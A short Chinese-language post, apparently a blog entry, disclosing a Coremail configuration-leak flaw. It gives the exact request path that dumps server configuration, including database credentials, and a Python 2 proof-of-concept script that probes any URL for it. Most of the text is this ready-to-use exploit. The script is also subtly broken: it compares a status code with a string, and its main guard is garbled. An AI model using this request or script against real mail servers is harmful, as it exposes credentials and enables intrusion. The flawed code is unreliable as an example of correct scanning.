hw行动爆出来的~
该漏洞可造成coremail的配置文件信息泄露,其中包括数据库连接的用户名密码等敏感信息。
测试:
Coremail地址 + /mailsms/s?func=ADMIN:appState&dumpConfig=/
poc:
import requests,sys
def mailsmsPoC(url):
url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/"
r = requests.get(url)
if (r.status_code != '404') and ("/home/coremail" in r.text):
print "mailsms is vulnerable: {0}".format(url)
else:
print "mailsms is safe!"
if name == 'main':
try:
mailsmsPoC(sys.argv[1])
except:
print "usage: python poc.py https://www.shungg.cn/"